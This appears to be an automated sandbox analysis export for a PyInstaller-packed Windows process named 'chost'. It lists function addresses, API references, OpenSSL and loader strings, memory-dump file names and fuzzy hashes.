Opcode ID: 54c9b998d77841e0b21ccc2029236863fc8a44b2765e6384edbaf71f67d80b6e
Instruction ID: fea3ff3c625647fdf20c9dc65f7e256d468c39b2fc7cd67a8f1a81b48b3090c1
Opcode Fuzzy Hash: 54c9b998d77841e0b21ccc2029236863fc8a44b2765e6384edbaf71f67d80b6e
Instruction Fuzzy Hash: BCE17B6AB08B8281EB258F15D564BF963B1EF48B84F04A135CA6D8B7D9DF3CE455A300

Function 00007FFDF6A41A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A832B6
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A832D7
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A832F8
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A83319
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A83336
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A83353
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A83370
00007FFDF6B14D31.LIBCRYPTO-3 ref: 00007FFDF6A8338D

Strings

ssl_srp_ctx_init_intern, xrefs: 00007FFDF6A8342D
..\s\ssl\tls_srp.c, xrefs: 00007FFDF6A833C3, 00007FFDF6A83402, 00007FFDF6A83436, 00007FFDF6A83454, 00007FFDF6A8346D

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
API String ID: 3568877910-1794268454
Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction ID: 7cb1b4d75b437fa36bd9bde617acbd291c34c068b78e2ec6604378eec499de51
Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction Fuzzy Hash: B1916622B0AF8281FB49DB65D460BBC7398FF45B08F184635DE7D07A9ADF28E5918310

Function 00007FF694362180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6943621AB
SelectObject.GDI32 ref: 00007FF6943621F2
DrawTextW.USER32 ref: 00007FF694362215
SelectObject.GDI32 ref: 00007FF69436222B
ReleaseDC.USER32 ref: 00007FF69436223B
MoveWindow.USER32 ref: 00007FF69436228B
MoveWindow.USER32 ref: 00007FF6943622CB
MoveWindow.USER32 ref: 00007FF69436231E
MoveWindow.USER32 ref: 00007FF694362366

Strings

P%, xrefs: 00007FF6943621FF

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 877da75f18e5e8b3eee9767dd813e20d2e9a208c22d3939476ce08ce795968ee
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 9551E726604BA186D6349F37E4581BAB7A1F798B61F008125EFDE83795DF3CD085DB10

Function 00007FF6943680B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6943680EF
GetWindowLongPtrW.USER32 ref: 00007FF69436816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF694368182
GetLastError.KERNEL32 ref: 00007FF69436818C
SetWindowLongPtrW.USER32 ref: 00007FF6943681A3

Strings

Needs to remove its temporary files., xrefs: 00007FF694368175

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: daa309e79a971a5938048be77156e171a5db39da0d2077ee6da1dba294006256
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: C421A821B09A4382E7654B7BA8D5179A250EF88B94F588274EA3DC33E9DE2CD591C300

Function 00007FFDEAE42720 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDEAE42748
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDEAE4279A
_RTC_Initialize.LIBCMT ref: 00007FFDEAE427C8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDEAE427EE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDEAE42819

Memory Dump Source

Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true

Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction ID: db59c1f221846c512e85dbd670ee823604ad35d8c6ae83fd3c9e0a46d1723ab4
Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction Fuzzy Hash: 6B81D021F0C24346FA6DBB6694713BD2298AF85F80F5481B5EACC43796DE3EEC458712

Function 00007FF694376300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943769CC

Strings

f, xrefs: 00007FF694376465
:, xrefs: 00007FF6943764FC
p, xrefs: 00007FF69437646D
p, xrefs: 00007FF6943763F5
-, xrefs: 00007FF6943763D9

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: bcb615e6d2dc45115b3c08d31e0f14b4923dc47681d1c97be12a33c3beecd11d
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: FB126C72A0C183C6FB749A2691A42B976A1FB50770F94C17DE6DAC6AC5DF3CE590CB00

Function 00007FF694371038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694371078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694371440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943716DF

Strings

f, xrefs: 00007FF69437117A
p, xrefs: 00007FF69437111D
f, xrefs: 00007FF694371110
f, xrefs: 00007FF6943712C5
p, xrefs: 00007FF694371182

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 6c635943339b1005d1e5bfd80b3d1df99dec213bf81c3ee0982361b847a8193f
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 1A126F33E0C183C6FF749A26E0946B966A1EB40754F988179E6D9C6BC4DF7CE884DB10

Function 00007FF694361050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF694361108
fseek, xrefs: 00007FF6943610D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943610CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF694361098
fread, xrefs: 00007FF6943611FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943611F6
malloc, xrefs: 00007FF69436110F

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
Instruction ID: ec5b29f3ee001a00052139818e83dbfb05d0e20ceda91b008959f46fcfd6e79a
Opcode Fuzzy Hash: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
Instruction Fuzzy Hash: B2415E21A0865382EA30DB33A8866B9B394FF45BC4F4484B9ED5DC7796DE3CE505CB40

Function 00007FF694368850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF694363CBB), ref: 00007FF6943688F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF6943688FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF69436893C

Part of subcall function 00007FF694368A20: GetEnvironmentVariableW.KERNEL32(00007FF69436388E), ref: 00007FF694368A57
Part of subcall function 00007FF694368A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF694368A79

Part of subcall function 00007FF6943782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943782C1

Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

TMP, xrefs: 00007FF69436888C, 00007FF694368993
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF69436896E
TMP, xrefs: 00007FF6943688B2
_MEI%d, xrefs: 00007FF694368902
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6943688CC

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: aef251a8b39d2586d2fea0c913fb3acc5570be9425b6667555f62ba95da060a3
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: 54417121B1D64381EA38AB37A8D62B96291EF89B84F40C179ED4DC7796DE3CE504C301

Function 00007FFDF6A57250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A573CA
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A575E9
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A57623

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FFDF6A57667, 00007FFDF6A576E9
SECLEVEL=, xrefs: 00007FFDF6A57619
STRENGTH, xrefs: 00007FFDF6A575DF
ssl_cipher_process_rulestr, xrefs: 00007FFDF6A57660, 00007FFDF6A576DD

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
API String ID: 4069847057-331183818
Opcode ID: 264d796601ee4600ab856f7a5447ec93f073d7ad70ce69a7da71c276a595527a
Instruction ID: 3614e2152f5987448af52d22f4e44a38e7d9a781a61ff72fb79ed8fca057cac9
Opcode Fuzzy Hash: 264d796601ee4600ab856f7a5447ec93f073d7ad70ce69a7da71c276a595527a
Instruction Fuzzy Hash: 08D1D472B0C68246E761CA199460B3976E8FB44790F144135E9AE67EDDEE3CEC41CB00

Function 00007FF69436EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF69436EAD5

Part of subcall function 00007FF69436FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF69436FA6F
Part of subcall function 00007FF69436FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF69436FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF69436EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF69436EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF69436EF08

Strings

csm, xrefs: 00007FF69436EAEF
csm, xrefs: 00007FF69436EBD0
csm, xrefs: 00007FF69436EB56

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: c486dad9c05d8cdaf301deaaaed40cbe5c3140edf7d59c87d9ecfd8de4fe6594
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: D2D180729087428AEB309B76D4833AD37A4FB45798F108179EE8D97B9ADF38E455C700

Function 00007FFDF6A42536 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214COMMON

Download Yara Rule

APIs

00007FFE20033420.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFDF6A51BA1
GetLastError.KERNEL32 ref: 00007FFDF6A51D06

Strings

SSL_add_dir_cert_subjects_to_stack, xrefs: 00007FFDF6A51CEE, 00007FFDF6A51D27, 00007FFDF6A51DB3
%s/%s, xrefs: 00007FFDF6A51B81
..\s\ssl\ssl_cert.c, xrefs: 00007FFDF6A51CFA, 00007FFDF6A51D33, 00007FFDF6A51D71, 00007FFDF6A51DBF
SSL_add_file_cert_subjects_to_stack, xrefs: 00007FFDF6A51D65
calling OPENSSL_dir_read(%s), xrefs: 00007FFDF6A51D0F

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007E20033420ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
API String ID: 1442048445-502574948
Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction ID: 85edb462833f857bb380a45945fe671311484a7be200eef65fea82adef2c2ea3
Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction Fuzzy Hash: AB916C61B1C68242FB55FB21A471BBA7299EF85784F440135EA6E07FDEEF3CE8018604

Function 00007FF69437ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF69437F11A,?,?,0000016E153E74D8,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF69437F11A,?,?,0000016E153E74D8,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EF08

Strings

ext-ms-, xrefs: 00007FF69437EE59
api-ms-, xrefs: 00007FF69437EE46

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 8d67b55a8ae088118a163dd5005bf77d52e70ad4ae254cfddca917fc283f9476
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: D241CC72B1DA12C1FA25CB27988567522A1FF48B90F98897DED5EC7B94EE3CE404C300

Function 00007FF694362C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
MessageBoxW.USER32 ref: 00007FF694362D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF694362D70
[PYI-%d:ERROR] , xrefs: 00007FF694362CA6
%ls: , xrefs: 00007FF694362D22
Error, xrefs: 00007FF694362D8C

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 649b692ec7860ba4d2938e5c25e096bf65b030219bf8595977c55acd525289bf
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: A331C962708A4252E630AB37A8952AA76A5FF84794F418139EF4DD3799DF3CD506C700

Function 00007FFDF6A41497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

SHA2-256, xrefs: 00007FFDF6A992D7
tls_construct_stoc_cookie, xrefs: 00007FFDF6A98F8F, 00007FFDF6A991BE, 00007FFDF6A9934C, 00007FFDF6A993C8, 00007FFDF6A9943D
, xrefs: 00007FFDF6A992A3
HMAC, xrefs: 00007FFDF6A9928B
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDF6A98F9B, 00007FFDF6A991CA, 00007FFDF6A99353, 00007FFDF6A993D4, 00007FFDF6A99444

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
